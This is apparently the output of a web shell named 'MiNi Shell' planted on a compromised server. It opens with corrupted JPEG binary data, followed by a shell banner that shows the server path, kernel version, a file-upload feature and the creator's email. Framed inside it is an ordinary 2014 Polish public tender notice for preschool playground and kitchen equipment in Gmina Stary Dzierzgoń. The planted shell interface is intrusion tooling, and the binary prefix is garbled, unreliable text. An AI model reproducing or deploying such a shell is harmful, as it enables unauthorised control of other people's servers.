JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141114/375266-N-2014.html

<p class="kh_header"><b>Stary Dzierzgoń: Modernizacja oddziałów przedszkolnych w Gminie Stary Dzierzgoń - ciąg dalszy</b><br>
<b>Numer ogłoszenia: 375266 - 2014; data zamieszczenia: 14.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stary Dzierzgoń , Stary Dzierzgoń, 82-450 Stary Dzierzgoń, woj. pomorskie, tel. (055) 2761481.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starydzierzgon.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja oddziałów przedszkolnych w Gminie Stary Dzierzgoń - ciąg dalszy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1 - Zakup zestawu zręcznościowego oraz koszy i  ich montaż w Publicznej Szkole Podstawowej w Myślicach
1.Zestaw zręcznościowy  - 1 szt.
Zestaw zręcznościowy sześcioboczny - wykonany z drewna toczonego lub kantówki bezrdzeniowej, impregnowanego ciśnieniowo, malowany farbami ekologicznymi wodnorozpuszczalnymi. Montowany na kotwach betonowych min. 10cm nad ziemią. Łańcuchy o grubości min. 6mm. Wymiary jednego boku nie mniejsze niż 2x2m.
W skład sześcioboku ma wchodzić: judo, pajęczyna z łańcuchów, drabina na łańcuchach z okrąglaków, trapez wiszący na łańcuchach do podciągania i przewrotów, ścianka wspinaczkowa (sklejka wodoodporna grubości min. 18mm), trzepak dwupoziomowy wykonany z rurek malowanych proszkowo w min. 2 kolorach o śr. min. 30mm. Gniazda łączników oraz śruby mocujące należy zabezpieczyć zaślepkami z tworzywa sztucznego. Elementy metalowe muszą być ocynkowane i zabezpieczone antykorozyjnie. Elementy konstrukcyjne musza być zakończone u góry kapturkami np. z tworzywa sztucznego w celu zabezpieczenia przed nasiąkaniem lub wpływem wody opadowej. Wszystkie otwory w urządzeniu oraz odstępy między elementami, np. szczebelkami drabinki, muszą mieć wymiary dozwolone przez normę bezpieczeństwa,  w celu uniemożliwienia zakleszczenia poszczególnych części ciała dziecka. W celu uniknięcia zranień wszystkie zakończenia i krawędzie muszą być zaopatrzone w nakładki zabezpieczające, np. z tworzywa sztucznego lub mieć stępione krawędzie. Urządzenie musi posiadać wymagane atesty
i certyfikaty bezpieczeństwa, określoną sferę bezpieczeństwa oraz wysokość swobodnego upadku. Wszystkie elementy muszą być estetyczne i różnobarwne. Urządzenie należy wyposażyć w graficzną  lub opisową, dobrze widoczną informację o maksymalnym i minimalnym wieku i wadze dzieci mogących z niego korzystać, a także inne informacje istotne dla bezpieczeństwa użytkowników.
2.	Kosz metalowy na śmieci - 4 szt.
Wykonany ze stali malowanej proszkowo. Pojemność 35 l. Kosz musi być przytwierdzony do podłoża na placu zabaw.
Zadanie nr 2 - Dostawa piachu na plac zabaw do Publicznej Szkoły Podstawowej w Myślicach
1.Piach - 120 ton
Piach barwy jasnej, wieloziarnisty bez elementów organicznych. Wielkość ziaren od 0,1 - 2,00 mm. Piach przeznaczony na plac zabaw przy Publicznej Szkole Podstawowej
w Myślicach.
Zadanie nr 3 - Zakup sprzętu do  zaplecza kuchennego do  Publicznej Szkoły Podstawowej w Myślicach
1.Gofrownica - 3 szt.
Gofrownica przeznaczona do pieczenia  dwóch gofrów prostokątnych (duża kratka).  Powłoka płyt z materiału nieprzywieralnego. Powinna posiadać termoizolowaną obudowę, nienagrzewający się uchwyt.  Moc min. 1300 W. 
2.Maszynka do mielenia mięsa - 1 szt.
Wydajność do 3 kg mięsa na minutę,  kołek dociskowy wykonany z twardego tworzywa: 3 sitaka w zestawie: 3 mm, 4,5 mm, 8 mm, średnica sitka 69 mm; 2 końcówki do wyboru kiełbas o 12 i 21 mm; końcówka do wyrobu  tatara; ilość obrotów ślimaka:
- poz. 1-150 obr/min,
- poz.2 -210 obr/min,
rewers 100 obr/min., 
zasilanie 230V, moc 2000 W.  
3.	Robot wieloczynnościowy - 1 szt.
Wyposażenie: 2 popychacze, dwustronna tarcza do szatkowania, dwustronna tarcza do ścierania, hak do zagniatania ciasta, kielich do koktajli, końcówka do ubijania, łopatka, misa robocza z pokrywą, nóż wielofunkcyjny ze stali szlachetnej, sokowirówka, tarcza do frytek, tarcza do tarcia ziemniaków, wyciskarka do cytrusów, suszarka do sałaty, ziół i warzyw, pojemnośc kosza 2,7 l., pojemność misy 4 l. Płynna regulacja obrotów; tryb pulsacyjny; moc silnika 800 W;  podstawa antypoślizgowa. 
4.Brytfanna - 1szt.
Żeliwny garnek - brytfanna, żeliwna, warstwa emaliowana na zewnątrz i od wewnątrz, 2 uchwyty, pokrywka.. Pojemność min. 6,5 l., długość ok. 32 cm.

1.Dostawa nastąpi w godzinach od 8.00 do 13.00 do Publicznej Szkoły Podstawowej w Myślicach, Myślice 16.
2.Wykonawca udzieli Zamawiającemu 24 miesięcy gwarancji jakości i rękojmi za wady fizyczne każdego z elementów  przedmiotu umowy z wyłączeniem systemów i urządzeń objętych przedmiotem zamówienia, dla których gwarancji udziela producent - w przypadku systemów i urządzeń objętych przedmiotem zamówienia obowiązuje okres gwarancji zgodnie z warunkami gwarancji producenta, jednak nie krótszy niż 24 miesiące. Bieg terminu gwarancji jakości i rękojmi za wady rozpoczyna się od daty odbioru końcowego przedmiotu umowy, a w przypadku stwierdzenia wad, od ich usunięcia i przekazania Zamawiającemu przedmiotu umowy jako należycie wykonanego.
3.Strony umowy postanawiają, że odpowiedzialność wykonawcy z tytułu rękojmi zostanie rozszerzona przez udzielenie 36 miesięcy gwarancji za wady fizyczne każdego z elementów przedmiotu umowy, licząc od dnia odbioru końcowego całego przedmiotu umowy z wyjątkiem urządzeń, na które ich producenci udzielili dłuższego okresu gwarancji - według gwarancji producenta, z zastrzeżeniem maksymalnego okresu - w przypadku oferowania przez producenta opcjonalnych okresów gwarancji. 
4.Zamawiający zastrzega sobie możliwość zwrotu dostarczonego asortymentu nie spełniającego wymogów jakościowych opisanych w SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 39.71.00.00-2, 39.22.10.00-7, 39.22.11.80-2, 14.21.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 20.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie oświadczenia wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin realizacji - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę treści umowy na pisemny wniosek każdej ze stron umowy, jeżeli wystąpi co najmniej jedna z niżej wymienionych okoliczności:
1) konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT);
	2)	zaistnienia zdarzeń niezależnych od stron, po dacie zawarcia Umowy, o charakterze działania siły wyższej, które umożliwiłyby terminowe wykonanie zobowiązań - strony zobowiązują się do wspólnego określenia nowego terminu realizacji przedmiotu umowy.
.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ug.starydzierzgon.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Stary Dzierzgoń, Stary Dzierzgoń 71, 82-450 Stary Dzierzgoń, pokój nr 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.11.2014 godzina 10:00, miejsce: Urząd Gminy Stary Dzierzgoń, Stary Dzierzgoń 71, 82-450 Stary Dzierzgoń, pokój nr sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane jest w ramach projektu Modernizacja oddziałów przedszkolnych w Gminie Stary Dzierzgoń w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.1 Zmniejszenie nierówności w stopniu upowszechniania edukacji przedszkolnej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup zestawu zręcznościowego oraz koszy i  ich montaż w Publicznej Szkole Podstawowej w Myślicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zestaw zręcznościowy  - 1 szt.
Zestaw zręcznościowy sześcioboczny - wykonany z drewna toczonego lub kantówki bezrdzeniowej, impregnowanego ciśnieniowo, malowany farbami ekologicznymi wodnorozpuszczalnymi. Montowany na kotwach betonowych min. 10cm nad ziemią. Łańcuchy o grubości min. 6mm. Wymiary jednego boku nie mniejsze niż 2x2m.
W skład sześcioboku ma wchodzić: judo, pajęczyna z łańcuchów, drabina na łańcuchach z okrąglaków, trapez wiszący na łańcuchach do podciągania i przewrotów, ścianka wspinaczkowa (sklejka wodoodporna grubości min. 18mm), trzepak dwupoziomowy wykonany z rurek malowanych proszkowo w min. 2 kolorach o śr. min. 30mm. Gniazda łączników oraz śruby mocujące należy zabezpieczyć zaślepkami z tworzywa sztucznego. Elementy metalowe muszą być ocynkowane i zabezpieczone antykorozyjnie. Elementy konstrukcyjne musza być zakończone u góry kapturkami np. z tworzywa sztucznego w celu zabezpieczenia przed nasiąkaniem lub wpływem wody opadowej. Wszystkie otwory w urządzeniu oraz odstępy między elementami, np. szczebelkami drabinki, muszą mieć wymiary dozwolone przez normę bezpieczeństwa,  w celu uniemożliwienia zakleszczenia poszczególnych części ciała dziecka. W celu uniknięcia zranień wszystkie zakończenia i krawędzie muszą być zaopatrzone w nakładki zabezpieczające, np. z tworzywa sztucznego lub mieć stępione krawędzie. Urządzenie musi posiadać wymagane atesty
i certyfikaty bezpieczeństwa, określoną sferę bezpieczeństwa oraz wysokość swobodnego upadku. Wszystkie elementy muszą być estetyczne i różnobarwne. Urządzenie należy wyposażyć w graficzną  lub opisową, dobrze widoczną informację o maksymalnym i minimalnym wieku i wadze dzieci mogących z niego korzystać, a także inne informacje istotne dla bezpieczeństwa użytkowników.
2.Kosz metalowy na śmieci - 4 szt.
Wykonany ze stali malowanej proszkowo. Pojemność 35 l. Kosz musi być przytwierdzony do podłoża na placu zabaw..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin realizacji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa piachu na plac zabaw do Publicznej Szkoły Podstawowej w Myślicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Piach - 120 ton
Piach barwy jasnej, wieloziarnisty bez elementów organicznych. Wielkość ziaren od 0,1 - 2,00 mm. Piach przeznaczony na plac zabaw przy Publicznej Szkole Podstawowej
w Myślicach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 14.21.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup sprzętu do  zaplecza kuchennego do  Publicznej Szkoły Podstawowej w Myślicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Gofrownica - 3 szt.
Gofrownica przeznaczona do pieczenia  dwóch gofrów prostokątnych (duża kratka).  Powłoka płyt z materiału nieprzywieralnego. Powinna posiadać termoizolowaną obudowę, nienagrzewający się uchwyt.  Moc min. 1300 W. 
2.Maszynka do mielenia mięsa - 1 szt.
Wydajność do 3 kg mięsa na minutę,  kołek dociskowy wykonany z twardego tworzywa: 3 sitaka w zestawie: 3 mm, 4,5 mm, 8 mm, średnica sitka 69 mm; 2 końcówki do wyboru kiełbas o 12 i 21 mm; końcówka do wyrobu  tatara; ilość obrotów ślimaka:
- poz. 1-150 obr/min,
- poz.2 -210 obr/min,
rewers 100 obr/min., 
zasilanie 230V, moc 2000 W.  
3.Robot wieloczynnościowy - 1 szt.
Wyposażenie: 2 popychacze, dwustronna tarcza do szatkowania, dwustronna tarcza do ścierania, hak do zagniatania ciasta, kielich do koktajli, końcówka do ubijania, łopatka, misa robocza z pokrywą, nóż wielofunkcyjny ze stali szlachetnej, sokowirówka, tarcza do frytek, tarcza do tarcia ziemniaków, wyciskarka do cytrusów, suszarka do sałaty, ziół i warzyw, pojemnośc kosza 2,7 l., pojemność misy 4 l. Płynna regulacja obrotów; tryb pulsacyjny; moc silnika 800 W;  podstawa antypoślizgowa. 
4.Brytfanna - 1szt.
Żeliwny garnek - brytfanna, żeliwna, warstwa emaliowana na zewnątrz i od wewnątrz, 2 uchwyty, pokrywka.. Pojemność min. 6,5 l., długość ok. 32 cm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.00.00-2, 39.22.10.00-7, 39.22.11.80-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin realizacji - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com